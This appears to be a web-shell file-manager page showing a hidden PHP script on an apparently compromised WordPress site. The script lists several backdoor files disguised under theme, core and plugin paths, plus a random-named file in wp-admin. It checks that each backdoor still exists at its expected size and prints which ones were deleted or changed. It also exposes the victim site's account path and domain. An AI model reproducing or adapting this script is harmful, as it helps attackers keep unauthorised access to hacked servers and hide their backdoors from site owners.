Viewing File: /dev/shm/.mrk

<?php   $r = '/home/houscjmf/techinverse.net'; $x = ["/wp-content/themes/twentytwentytwo/inc/patterns/footer-default.php"=>"bd@@310292@@14",
"/wp-includes/block-supports/position.php"=>"bd@@308580@@71",
"/wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/assets/src/components/layout/Health.php"=>"bd@@310424@@613",
"/wp-admin/2wQCNhpaq8K.php"=>"bd@@23499@@36335",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/steps/page-builder/formcolorpicker.php"=>"bd@@310477@@877",
"/wp-content/plugins/astra-sites/inc/lib/onboarding/assets/src/steps/customize-site/customize-steps/license-validation/pointscp.php"=>"bd@@308695@@608"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 
Back to Directory File Manager